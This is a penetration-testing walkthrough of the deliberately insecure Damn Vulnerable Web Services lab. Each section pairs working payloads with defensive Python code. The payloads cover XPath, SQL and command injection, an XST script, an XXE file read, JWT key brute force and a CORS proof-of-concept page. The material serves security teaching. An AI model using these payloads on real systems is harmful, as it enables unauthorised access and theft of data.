Damn Vulnerable Web Services (DVWS) - Walkthrough
Installation
Damn Vulnerable Web Services (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real-world web service vulnerabilities. https://github.com/snoopysecurity/dvws
WSDL Enumeration
Spider DVWS using Burp Suite and look for service.php
Requests processed by the SOAP service include check_user_information, owasp_apitop10, population and return_price.
XPATH Injection
User Login:
1' or '1'='1
User Password:
1' or '1'='1
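The login above works because both fields are pasted straight into an XPath predicate. The following added example (my own code, not DVWS's) shows the raw-concatenation query that the payload rewrites, next to a builder that encodes each value as an XPath 1.0 string literal (single quotes, double quotes, or concat() when both are present) so a quote in the input can never close the literal. The user store is a constructed sample, and find_user uses Python's ElementTree, whose limited XPath has no and/or operator, so the two conditions are chained as two predicates.

```python
import xml.etree.ElementTree as ET

# Constructed sample user store; DVWS's real data file is not used here.
USERS_XML = """<users>
  <user><login>alice</login><password>s3cret</password></user>
  <user><login>bob</login><password>hunter2</password></user>
</users>"""
ROOT = ET.fromstring(USERS_XML)


def vulnerable_query(login, password):
    """Raw concatenation: the 1' or '1'='1 payload rewrites the predicate."""
    return "//user[login='" + login + "' and password='" + password + "']"


def xpath_literal(value):
    """Encode value as an XPath 1.0 string literal so quotes cannot close it."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Both quote kinds present: XPath 1.0 has no escape sequence, so split on
    # the single quotes and rebuild the string with concat().
    parts = value.split("'")
    pieces = []
    for i, part in enumerate(parts):
        if part:
            pieces.append("'" + part + "'")
        if i < len(parts) - 1:
            pieces.append('"\'"')
    return "concat(" + ", ".join(pieces) + ")"


def safe_query(login, password):
    """Same query shape as vulnerable_query, but with quoted literals."""
    return ("//user[login=" + xpath_literal(login)
            + " and password=" + xpath_literal(password) + "]")


def find_user(login, password):
    """Authenticate against the sample store with two quoted predicates.

    ElementTree accepts [tag='text'] and [tag="text"] predicates but not
    concat(), so inputs containing both quote characters are refused here
    rather than evaluated; a full XPath engine would take the concat() form.
    """
    for value in (login, password):
        if "'" in value and '"' in value:
            raise ValueError("mixed quotes need concat(), unsupported by ElementTree")
    path = (".//user[login=" + xpath_literal(login)
            + "][password=" + xpath_literal(password) + "]")
    return ROOT.find(path)
```

With the literal quoted, the payload is compared as an ordinary login string and matches nobody; the concat() branch is the part most hand-rolled escapers forget.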
Command Injection
Original Request
The parameter value of name is "find" by default.
Edited Request
Change the parameter value of name from "find" to "dir".
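Swapping "find" for "dir" only works because the name parameter ends up in a shell command. As an added example (mine, not part of DVWS), the handler below treats the parameter as a key into a hypothetical allowlist of fixed argv vectors and runs the selected tool without a shell, so neither a different command name nor shell metacharacters in the value change what executes.

```python
import subprocess

# Hypothetical allowlist: the request's "name" parameter may only select one of
# these fixed argv vectors; the value itself never reaches a shell.
ALLOWED_TOOLS = {
    "find": ["find", ".", "-maxdepth", "1", "-name", "*.txt"],
}


def is_permitted(name):
    """True only for an exact allowlisted key ("dir", "find; id" are rejected)."""
    return name in ALLOWED_TOOLS


def build_command(name):
    """Return the argv for an allowlisted name, or raise for anything else."""
    if not is_permitted(name):
        raise ValueError("tool %r is not permitted" % (name,))
    return list(ALLOWED_TOOLS[name])


def run_tool(name):
    """Execute the allowlisted tool without a shell and return its stdout."""
    argv = build_command(name)
    # No shell=True: the argv list is passed to execve as-is and never re-parsed.
    completed = subprocess.run(argv, capture_output=True, text=True, check=False)
    return completed.stdout
```

Logging the rejected names (rather than silently ignoring them) gives a cheap detection signal for the kind of probing the walkthrough performs.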
Cross Site Tracing (XST)
DVWS gives the hint "The NuSOAP Library service is vulnerable to a Cross-site scripting flaw". An exploit is published at Exploit-DB (https://www.exploit-db.com/exploits/34565/).
Note: we modified the source code at \dvws\vulnerabilities\xst\xst.php because the cookie was created improperly. The following snippet is moved to the beginning of xst.php:
As mentioned by DVWS, the vulnerable page is /dvws/vulnerabilities/wsdlenum/service.php/
The payload we used to perform XST is as follows:
<ScrIpt type='text/javascript'>
var req = new XMLHttpRequest();
req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php',false);
req.send();
result=req.responseText;
alert(result);
</scRipT>
URL:
http://localhost/dvws/vulnerabilities/wsdlenum/service.php/<ScrIpt type='text/javascript'>var req = new XMLHttpRequest();req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php',false);req.send();result=req.responseText;alert(result);</scRipT>
Amend the GET method to the TRACK method.
Cookie information is disclosed.
To better understand XST, please read the article Penetration Testing with OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS).
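From the server side, the two ingredients of the XST chain above are visible in the access log: a TRACE or TRACK request, and a script tag carried in the path of service.php. The following added example (my own detection code, not from DVWS) parses a few constructed Apache-style log lines and flags both. The lines and IP addresses are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in Apache common format (not real traffic).
LOG_LINES = [
    '127.0.0.1 - - [10/Oct/2020:13:55:36 +0000] "GET /dvws/vulnerabilities/wsdlenum/service.php HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2020:13:55:40 +0000] "TRACK /dvws/vulnerabilities/xst/xst.php HTTP/1.1" 200 128',
    '127.0.0.1 - - [10/Oct/2020:13:55:41 +0000] "TRACE / HTTP/1.1" 405 0',
    '10.0.0.5 - - [10/Oct/2020:13:56:02 +0000] "GET /dvws/vulnerabilities/wsdlenum/service.php/%3CScrIpt%3Ealert(1)%3C/scRipT%3E HTTP/1.1" 200 900',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
SCRIPT_TAG_RE = re.compile(r"<\s*script", re.IGNORECASE)


def classify(line):
    """Return a finding dict for a suspicious line, or None for a benign one."""
    match = LOG_RE.match(line)
    if not match:
        return None
    method = match.group("method").upper()
    # Decode percent-encoding so the mixed-case <ScrIpt> variant is caught too.
    path = unquote(match.group("path"))
    reasons = []
    if method in ("TRACE", "TRACK"):
        reasons.append("trace-method")
    if SCRIPT_TAG_RE.search(path):
        reasons.append("script-in-path")
    if not reasons:
        return None
    return {
        "ip": match.group("ip"),
        "method": method,
        "path": path,
        "status": int(match.group("status")),
        "reasons": reasons,
    }


def scan_log(lines):
    """Run classify over every line and keep the findings."""
    return [f for f in (classify(line) for line in lines) if f is not None]
```

A status of 405 on the TRACE line is what you want to see; on Apache the directive TraceEnable off produces it, and any 200 to TRACE or TRACK is worth an alert on its own.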
REST API SQL Injection
2 or 1=1
Extract Information
2 UNION SELECT 1,2
2 UNION SELECT database(),@@datadir
Extract Table Name
2 union select group_concat(table_name),database() from information_schema.tables where table_schema = 'dvws'--
Extract Column Name
2 union select group_concat(column_name),database() from information_schema.columns where table_schema='dvws' and table_name='users'--
Dump Data From Extracted Table and Column Names
2 union select id, secret from users--
To better understand SQL Injection, please read the article Penetration Testing with OWASP Top 10 - 2017 A1 Injection.
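Every payload in this section relies on the id being concatenated into the query text. The added example below (my own code, not DVWS's PHP) reproduces that pattern against a constructed in-memory SQLite users table, then shows the parameterised version, which rejects anything that is not an integer before the database sees it. MySQL-specific pieces such as database() and group_concat() are left out; the 2 or 1=1 and union select id, secret payloads behave the same way in SQLite.

```python
import sqlite3


def make_db():
    """Constructed sample table; the DVWS schema is not used here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice-secret"), (2, "bob", "bob-secret"), (3, "carol", "carol-secret")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the walkthrough's payloads work exactly like this."""
    sql = "SELECT id, name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def is_valid_id(value):
    """Accept only a plain decimal integer; '2 or 1=1' and union payloads fail."""
    try:
        int(value)
    except (TypeError, ValueError):
        return False
    return True


def lookup_safe(conn, user_id):
    """Validate, then bind the value as a parameter so it is data, not SQL."""
    if not is_valid_id(user_id):
        raise ValueError("id must be an integer")
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (int(user_id),)).fetchall()
```

Binding alone would already stop the injection (the payload would be compared as a string and match nothing); the integer check on top gives a clean error to log instead of an empty result.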
XML External Entity 2
<!DOCTYPE uservalue [
<!ENTITY systemEntity SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<uservalue>
<value>&systemEntity;</value>
</uservalue>
Request
Response
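The payload above only reads the hosts file because the parser honours the DOCTYPE and its SYSTEM entity. The added example below (my own code, not DVWS's) applies the usual hardening for untrusted XML: refuse any document that carries a DOCTYPE or ENTITY declaration before it reaches the parser, which also covers internal entity-expansion documents. The safe sample document is constructed; the rejected one is the walkthrough's own payload.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD or entity declaration is refused outright; untrusted input never
# needs one. The check is byte-based so it runs before any parsing happens.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed benign request body.
SAFE_DOC = b"<uservalue><value>hello</value></uservalue>"

# The walkthrough's XXE payload, used here only as the rejected input.
XXE_DOC = b"""<!DOCTYPE uservalue [
<!ENTITY systemEntity SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<uservalue>
<value>&systemEntity;</value>
</uservalue>"""


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE or ENTITY declaration."""


def parse_untrusted(data):
    """Parse request XML, refusing anything that declares a DTD or entity."""
    if DTD_RE.search(data):
        raise DTDForbidden("DTD and entity declarations are not accepted")
    return ET.fromstring(data)


def is_accepted(data):
    """Convenience wrapper: True if parse_untrusted would accept the document."""
    try:
        parse_untrusted(data)
    except (DTDForbidden, ET.ParseError):
        return False
    return True
```

The regex will also reject a CDATA section that merely contains the text "<!DOCTYPE"; for an API that never expects a DTD that false positive is acceptable, and it is the same trade-off defusedxml makes with its forbid_dtd option.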
JSON Web Token (JWT) Secret Key Brute Force
Correct secret key of 1234567890 found!
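A ten-digit secret falls to a wordlist because HS256 is only as strong as the key behind it. The added example below (my own code, not DVWS's) signs and verifies compact HS256 tokens with the standard library, pins the algorithm server-side instead of trusting the token's alg header, compares signatures in constant time, and enforces the RFC 7518 minimum of a 256-bit key, which a secret like 1234567890 fails. The claims used are constructed.

```python
import base64
import binascii
import hashlib
import hmac
import json
import secrets

MIN_SECRET_BYTES = 32  # RFC 7518 section 3.2: HS256 keys must be at least 256 bits


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, secret):
    """Issue a compact JWS (header.payload.signature) with HS256."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = (header + "." + payload).encode("ascii")
    signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return header + "." + payload + "." + b64url(signature)


def verify_hs256(token, secret):
    """Return the claims if the HS256 signature is valid, otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        provided = b64url_decode(sig_b64)
    except (ValueError, binascii.Error):
        return None
    # The server decides the algorithm; the token's alg must simply agree.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    # Constant-time comparison so timing does not leak how many bytes matched.
    if not hmac.compare_digest(expected, provided):
        return None
    return json.loads(b64url_decode(payload_b64))


def secret_is_acceptable(secret):
    """Key policy: at least 256 bits and not a bare digit string."""
    return len(secret) >= MIN_SECRET_BYTES and not secret.isdigit()


def generate_secret():
    """Fresh random key that satisfies the policy."""
    return secrets.token_bytes(MIN_SECRET_BYTES)
```

Running secret_is_acceptable at application start-up (and failing to boot on a weak key) is the cheapest way to make sure a test value such as 1234567890 never reaches production.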
Same Origin Method Execution (SOME)
Cross-Origin Resource Sharing (CORS)
Check if arbitrary origin trusted
Request
Change the Origin request header to "http://xyz.com".
Response
The response shows that the application allows access from any domain (origin http://xyz.com).
The response header Access-Control-Allow-Credentials: true indicates that third-party sites may be able to carry out privileged actions and retrieve sensitive information.
Content of cors_poc.html
<html>
<head></head>
<body>
<div id="secret"></div>
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("secret").innerHTML = this.responseText;
}
};
xhttp.open("POST", "https://192.168.24.2/dvws/vulnerabilities/cors/server.php", true);
xhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhttp.send(JSON.stringify({"searchterm":"secretword:one"}));
</script>
</body>
</html>
Request
Response
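The CORS check above succeeds because server.php reflects whatever Origin arrives and pairs it with Access-Control-Allow-Credentials: true. As an added example (my own code, not the DVWS server.php), the two functions below return the response headers a handler would emit for a given Origin: the reflecting version reproduces what the walkthrough observed, and the allowlisted version exact-matches the normalised origin against a hypothetical set of trusted origins, rejecting the literal "null", look-alike hosts and anything that is not a bare scheme://host.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of origins that may read responses with credentials.
ALLOWED_ORIGINS = {"https://app.example", "https://admin.example"}


def cors_headers_reflecting(origin):
    """Weak setting: echo any Origin and allow credentials with it.

    This is the behaviour the walkthrough observes (http://xyz.com echoed back
    together with Access-Control-Allow-Credentials: true).
    """
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers_allowlisted(origin, allowed=ALLOWED_ORIGINS):
    """Hardened setting: exact-match the origin against a fixed allowlist.

    Returning no CORS headers at all is the correct failure mode: the browser
    then refuses to hand the cross-origin response body to the caller.
    """
    if origin is None:
        return {}
    parts = urlsplit(origin)
    # An Origin is scheme://host[:port] only; anything else (including the
    # literal "null") is rejected, and the comparison is exact, not a prefix.
    if parts.path or parts.query or parts.fragment or not parts.netloc:
        return {}
    normalized = parts.scheme.lower() + "://" + parts.netloc.lower()
    if normalized not in allowed:
        return {}
    return {
        "Access-Control-Allow-Origin": normalized,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }
```

The Vary: Origin header matters once the allowlist has more than one entry, otherwise a shared cache can serve one origin's Access-Control-Allow-Origin value to another.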